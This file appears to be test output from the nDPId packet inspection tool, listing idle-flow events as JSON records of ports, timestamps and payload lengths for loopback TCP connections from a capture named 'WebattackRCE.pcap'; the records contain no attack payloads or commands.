-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 